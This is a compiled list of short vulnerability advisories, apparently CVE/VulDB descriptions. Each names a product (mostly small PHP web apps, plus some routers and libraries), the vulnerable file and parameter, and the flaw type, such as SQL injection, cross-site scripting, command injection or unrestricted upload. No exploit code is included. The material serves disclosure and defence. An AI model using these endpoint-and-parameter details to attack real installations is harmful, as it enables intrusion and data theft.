A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file member_register.php. The manipulation of the argument fullname/username/password/email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "password" to be affected. But it must be assumed that other parameters are affected as well.
A vulnerability, which was classified as critical, was found in MitraStar GPT-2541GNAC BR_g5.6_1.11(WVK.0)b26. Affected is an unknown function of the file /cgi-bin/settings-firewall.cgi of the component Firewall Settings Page. The manipulation of the argument SrcInterface leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
A vulnerability classified as critical has been found in code-projects Pharmacy Management System 1.0. This affects an unknown part of the file /php/manage_customer.php?action=search. The manipulation of the argument text leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Drag and Drop Image Upload 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /upload.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Eyewear Shop 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file classes/Master.php?f=add_to_card of the component POST Request Handler. The manipulation of the argument product_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Eyewear Shop 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/?page=reports of the component Report Viewing Page. The manipulation of the argument date leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Eyewear Shop 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/?page=system_info/contact_info of the component Contact Information Page. The manipulation of the argument Address leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
A vulnerability, which was classified as critical, was found in HuangDou UTCMS V9. This affects an unknown part of the file app/modules/ut-template/admin/template_creat.php. The manipulation of the argument content leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in HuangDou UTCMS V9. Affected by this issue is some unknown functionality of the file app/modules/ut-cac/admin/cli.php. The manipulation of the argument o leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in SourceCodester Online Eyewear Shop 1.0. Affected is an unknown function of the file /admin/?page=inventory/view_inventory&amp;id=2. The manipulation of the argument Code leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Eyewear Shop 1.0. This issue affects some unknown processing of the file /admin/?page=inventory/view_inventory&amp;id=2. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in code-projects Blood Bank System 1.0. Affected is an unknown function of the file reset.php. The manipulation of the argument useremail leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in 07FLYCMS, 07FLY-CMS and 07FlyCRM 1.3.8. It has been rated as problematic. Affected by this issue is some unknown functionality of the component System Settings Page. The manipulation of the argument Login Interface Copyright leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The affected product is known with different names like 07FLYCMS, 07FLY-CMS, and 07FlyCRM. It was not possible to reach out to the vendor before assigning a CVE due to a not working mail address.
A vulnerability classified as critical has been found in SourceCodester Online Veterinary Appointment System 1.0. Affected is an unknown function of the file /admin/categories/manage_category.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Blood Bank System 1.0. It has been classified as critical. This affects an unknown part of the file /update.php. The manipulation of the argument name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Codezips Tourist Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/change-image.php. The manipulation of the argument packageimage leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in Codezips Tourist Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/create-package.php. The manipulation of the argument packageimage leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in Codezips Pharmacy Management System 1.0. Affected is an unknown function of the file product/update.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in Codezips Pharmacy Management System 1.0. This issue affects some unknown processing of the file product/register.php. The manipulation of the argument category leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in code-projects Crud Operation System 1.0. This vulnerability affects unknown code of the file delete.php. The manipulation of the argument sid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in code-projects Restaurant Reservation System 1.0. This affects an unknown part of the file filter3.php. The manipulation of the argument company leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Record Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file sort2_user.php. The manipulation of the argument qualification leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Eyewear Shop 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/?page=products/view_product. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Craig Rodway Classroombookings 2.8.7 and classified as problematic. This issue affects some unknown processing of the file /sessions of the component Session Page. The manipulation of the argument Name leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.8.8 is able to address this issue. It is recommended to upgrade the affected component. The project maintainer was contacted early about the disclosure. He responded very quickly, friendly, and professional.
A vulnerability has been found in Craig Rodway Classroombookings up to 2.8.6 and classified as problematic. This vulnerability affects unknown code of the file /rooms/fields of the component Room Page. The manipulation of the argument Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.8.7 is able to address this issue. It is recommended to upgrade the affected component. The project maintainer was contacted early about the disclosure. He responded very quickly, friendly, and professional.
A vulnerability was found in code-projects Blood Bank System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/campsdetails.php. The manipulation of the argument hospital/address/city/contact leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "hospital".
A vulnerability was found in code-projects Blood Bank System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/campsdetails.php. The manipulation of the argument hospital leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been classified as problematic. This affects an unknown part of the file blooddetails.php. The manipulation of the argument Availibility leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
A vulnerability has been found in SourceCodester Profile Registration without Reload Refresh 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file add.php. The manipulation of the argument email_address/address/company_name/job_title/jobDescriptionparameter leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in code-projects Blood Bank System 1.0. Affected is an unknown function of the file register.php. The manipulation of the argument user leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in Codezips Online Shopping Portal 1.0. This issue affects some unknown processing of the file /update-image1.php. The manipulation of the argument productimage1 leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in D-Link DSL-2750U R5B017. This affects an unknown part of the component Port Forwarding Page. The manipulation of the argument PortMappingDescription leads to cross site scripting. It is possible to initiate the attack remotely.
A vulnerability was found in LyLme_spage 1.9.5. It has been classified as critical. Affected is an unknown function of the file /admin/sou.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in LyLme_spage 1.9.5 and classified as critical. This issue affects some unknown processing of the file /admin/apply.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in LyLme_spage 1.9.5 and classified as critical. This vulnerability affects unknown code of the file /admin/tag.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Contemporary Control System BASrouter BACnet BASRT-B 2.7.2. This affects an unknown part of the component UDP Packet Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in ESAFENET CDG V5. It has been rated as critical. Affected by this issue is some unknown functionality of the file /MultiServerBackService?path=1. The manipulation of the argument fileId leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netadmin Software NetAdmin IAM up to 3.5 and classified as problematic. Affected by this issue is some unknown functionality of the file /controller/api/Answer/ReturnUserQuestionsFilled of the component HTTP POST Request Handler. The manipulation of the argument username leads to information exposure through discrepancy. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure is planning to release a fix in mid-October 2024.
A vulnerability was found in Codezips Online Shopping Portal 1.0. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in code-projects Restaurant Reservation System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /filter2.php. The manipulation of the argument from/to leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "from" to be affected. But it must be assumed that parameter "to" is affected as well.
It is currently unknown if this issue is exploitable but a condition may arise where the structured clone of certain objects could lead to memory corruption. This vulnerability affects Firefox &lt; 131, Firefox ESR &lt; 128.3, Thunderbird &lt; 128.3, and Thunderbird &lt; 131.
A vulnerability was found in code-projects Restaurant Reservation System 1.0. It has been classified as critical. This affects an unknown part of the file /updatebal.php. The manipulation of the argument company leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Restaurant Reservation System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /addcompany.php. The manipulation of the argument company leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in ThingsBoard up to 3.7.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component HTTP RPC API. The manipulation leads to resource consumption. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 3.7.1 is able to address this issue. It is recommended to upgrade the affected component. The vendor was informed on 2024-07-24 about this vulnerability and announced the release of 3.7.1 for the second half of September 2024.
A vulnerability was found in SourceCodester Advocate Office Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /control/edit_client.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Blood Bank System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /forgot.php. The manipulation of the argument useremail leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in PHPGurukul Online Shopping Portal 2.0. This vulnerability affects unknown code of the file /shopping/admin/index.php of the component Admin Panel. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in Intelbras InControl up to 2.21.56. This affects an unknown part of the file C:\Program Files (x86)\Intelbras\Incontrol Cliente\incontrol_webcam\incontrol-service-watchdog.exe. The manipulation leads to unquoted search path. It is possible to launch the attack on the local host. The vendor was informed early on 2024-08-05 about this issue. The release of a fixed version 2.21.58 was announced for the end of August 2024 but then was postponed until 2024-09-20.
A vulnerability was found in Intelbras InControl up to 2.21.57. It has been rated as critical. Affected by this issue is some unknown functionality of the file /v1/operador/ of the component Relatório de Operadores Page. The manipulation of the argument fields leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was informed early on 2024-07-19 about this issue. The release of a fixed version 2.21.58 was announced for the end of August 2024 but then was postponed until 2024-09-20.
A vulnerability was found in SourceCodester Inventory Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /app/action/add_staff.php. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Supply Chain Management 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/edit_manufacturer.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Railway Reservation System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/inquiries/view_details.php. The manipulation of the argument id leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Online Timesheet App 1.0 and classified as problematic. This vulnerability affects unknown code of the file /endpoint/add-timesheet.php of the component Add Timesheet Form. The manipulation of the argument day/task leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in SourceCodester Online Timesheet App 1.0. This affects an unknown part of the file /endpoint/delete-timesheet.php. The manipulation of the argument timesheet leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Advocate Office Management System 1.0. Affected by this issue is some unknown functionality of the file /control/activate.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in code-projects Blood Bank Management System 1.0. Affected is an unknown function of the file /admin/blood/update/B+.php. The manipulation of the argument Bloodname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/maintenance/manage_department.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in SourceCodester Online Railway Reservation System 1.0. This vulnerability affects unknown code of the file contact_us.php of the component Message Us Form. The manipulation of the argument fullname/email/message leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in SourceCodester Online Railway Reservation System 1.0. This affects an unknown part of the file /?page=reserve. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Railway Reservation System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /?page=tickets of the component Ticket Handler. The manipulation of the argument id leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Railway Reservation System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/. The manipulation of the argument page with the input trains/schedules/system_info leads to improper authorization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Advocate Office Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /control/forgot_pass.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Advocate Office Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /control/login.php. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in dingfanzu CMS up to 29d67d9044f6f93378e6eb6ff92272217ff7225c. Affected by this issue is some unknown functionality of the file saveNewPwd.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available.
A vulnerability classified as problematic has been found in kalvinGit kvf-admin up to f12a94dc1ebb7d1c51ee978a85e4c7ed75c620ff. Affected is an unknown function of the file /ueditor/upload?configPath=ueditor/config.json&amp;action=uploadfile of the component XML File Handler. The manipulation of the argument upfile leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The GitHub repository of the project did not receive an update for more than two years.
A vulnerability was found in TP-LINK TL-WR841ND up to 20240920. It has been rated as critical. Affected by this issue is some unknown functionality of the file /userRpm/popupSiteSurveyRpm.htm. The manipulation of the argument ssid leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in RelaxedJS ReLaXed up to 0.2.2. Affected is an unknown function of the component Pug to PDF Converter. The manipulation leads to cross site scripting. An attack has to be approached locally. The exploit has been disclosed to the public and may be used.
A vulnerability was found in bg5sbk MiniCMS 1.11. It has been classified as problematic. Affected is an unknown function of the file page-edit.php. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions confusing version and file name information. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in bg5sbk MiniCMS up to 1.11 and classified as problematic. This issue affects some unknown processing of the file post-edit.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions confusing version and file name information. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in funnyzpc Mee-Admin up to 1.6. This affects an unknown part of the file /mee/index of the component User Center. The manipulation of the argument User Nickname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Langflow up to 1.0.18. Affected by this vulnerability is an unknown functionality of the file \src\backend\base\langflow\interface\utils.py of the component HTTP POST Request Handler. The manipulation of the argument remaining_text leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in TMsoft MyAuth Gateway 3. Affected is an unknown function of the file /index.php. The manipulation of the argument console/nocache/cmd leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in jeanmarc77 123solar up to 1.8.4.5. It has been rated as critical. This issue affects some unknown processing of the file /admin/admin_invt2.php. The manipulation of the argument PROTOCOLx leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in Enpass Password Manager up to 6.9.5 on Windows. This issue affects some unknown processing. The manipulation leads to cleartext storage of sensitive information in memory. An attack has to be approached locally. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 6.10.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as critical was found in code-projects Blood Bank System 1.0. This vulnerability affects unknown code of the file /admin/blood/update/o-.php. The manipulation of the argument bloodname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Profile Registration without Reload Refresh 1.0. This affects an unknown part of the file del.php of the component GET Parameter Handler. The manipulation of the argument list leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Profile Registration without Reload Refresh 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file add.php of the component Registration Form. The manipulation of the argument full_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
A vulnerability was found in code-projects Student Record System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument regno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Modern Loan Management System 1.0. It has been classified as critical. Affected is an unknown function of the file search_member.php. The manipulation of the argument searchMember leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Modern Loan Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file update_loan_record.php. The manipulation of the argument amount leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in code-projects Vehicle Management 1.0. This affects an unknown part of the file /edit1.php. The manipulation of the argument sno leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in code-projects Restaurant Reservation System 1.0. Affected is an unknown function of the file /filter.php. The manipulation of the argument from/to leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "from" to be affected. But it must be assumed that parameter "to" is affected as well.
A vulnerability was found in code-projects Restaurant Reservation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file index.php. The manipulation of the argument date leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions sid as affected paramater which is incorrect.
A vulnerability classified as problematic was found in code-projects Blood Bank System 1.0. This vulnerability affects unknown code of the file bbms.php. The manipulation of the argument fullname/age/bloodgroup/city/phno/gender as part of String leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in SourceCodester Employee Management System 1.0. This affects an unknown part of the file /Admin/add-admin.php. The manipulation of the argument txtfullname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Eyewear Shop 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Users.phpf=save of the component User Creation Handler. The manipulation of the argument type with the input 1 leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Eyewear Shop 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file view_category.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Student Record System 1.0. It has been classified as critical. Affected is an unknown function of the file /pincode-verification.php. The manipulation of the argument pincode leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Student Record System 1.0 and classified as critical. This issue affects some unknown processing of the file /marks.php. The manipulation of the argument coursename leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in code-projects Student Record System 1.0 and classified as critical. This vulnerability affects unknown code of the file /course.php. The manipulation of the argument coursename leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in dingfangzu up to 29d67d9044f6f93378e6eb6ff92272217ff7225c. Affected is an unknown function of the file scripts/order.js of the component Order Checkout. The manipulation of the argument address-name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in DedeCMS up to 5.7.115. It has been rated as critical. This issue affects some unknown processing of the file article_string_mix.php. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Stirling-Tools Stirling-PDF up to 0.28.3. It has been declared as problematic. This vulnerability affects unknown code of the component Markdown-to-PDF. The manipulation leads to cross site scripting. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 0.29.0 is able to address this issue. It is recommended to upgrade the affected component. The vendor explains that "this functionality was removed in 0.29.0 already" and "we plan to re-add at later date with issue resolved".
A vulnerability has been found in SourceCodester Best House Rental Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /ajax.php?action=update_account. The manipulation of the argument firstname/lastname/email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in code-projects Blood Bank Management System 1.0. This affects an unknown part of the component Password Handler. The manipulation leads to cleartext storage in a file or on disk. An attack has to be approached locally.
A vulnerability, which was classified as critical, has been found in SourceCodester Best House Rental Management System 1.0. Affected by this issue is some unknown functionality of the file /ajax.php?action=signup. The manipulation of the argument firstname/lastname/email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in Codezips Online Shopping Portal 1.0. Affected by this vulnerability is an unknown functionality of the file insert-product.php. The manipulation of the argument productimage1/productimage2/productimage3 leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in Codezips Internal Marks Calculation 1.0. Affected is an unknown function of the file index.php. The manipulation of the argument tid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin_add.php. The manipulation of the argument image leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/login.php of the component Admin Login. The manipulation of the argument username/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Patient Record Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Best House Rental Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /ajax.php?action=save_category. The manipulation of the argument name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in SourceCodester Simple Forum-Discussion System 1.0. Affected is an unknown function of the file /index.php. The manipulation of the argument page leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in CodeCanyon CRMGo SaaS up to 7.2. This issue affects some unknown processing of the file /project/task/{task_id}/show. The manipulation of the argument comment leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in CodeCanyon CRMGo SaaS 7.2. This vulnerability affects unknown code of the file /deal/{note_id}/note. The manipulation of the argument notes leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in code-projects Crud Operation System 1.0. Affected is an unknown function of the file updata.php. The manipulation of the argument sid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in code-projects Online Quiz Site 1.0. This issue affects some unknown processing of the file showtest.php. The manipulation of the argument subid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Best Online News Portal 1.0. This vulnerability affects unknown code of the file /news-details.php of the component Comment Section. The manipulation of the argument name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in jeanmarc77 123solar 1.8.4.5. This affects an unknown part of the file /detailed.php. The manipulation of the argument date1 leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The patch is named 94bf9ab7ad0ccb7fbdc02f172f37f0e2ea08d48f. It is recommended to apply a patch to fix this issue.
A vulnerability was found in jeanmarc77 123solar 1.8.4.5. It has been rated as critical. Affected by this issue is some unknown functionality of the file config/config_invt1.php. The manipulation of the argument PASSOx leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as f4a8c748ec436e5a79f91ccb6a6f73752b336aa5. It is recommended to apply a patch to fix this issue.
A vulnerability classified as critical has been found in D-Link DAR-7000 up to 20240912. Affected is an unknown function of the file /view/DBManage/Backup_Server_commit.php. The manipulation of the argument host leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability classified as problematic was found in SourceCodester Resort Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file manage_fee.php. The manipulation of the argument toview leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Online Eyewear Shop 1.0. This affects an unknown part of the file /classes/Master.php of the component Cart Content Handler. The manipulation of the argument cart_id/id leads to improper ownership management. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in MicroPython 1.22.2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file py/objarray.c. The manipulation leads to use after free. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 1.23.0 is able to address this issue. The identifier of the patch is 4bed614e707c0644c06e117f848fa12605c711cd. It is recommended to upgrade the affected component. In micropython objarray component, when a bytes object is resized and copied into itself, it may reference memory that has already been freed.
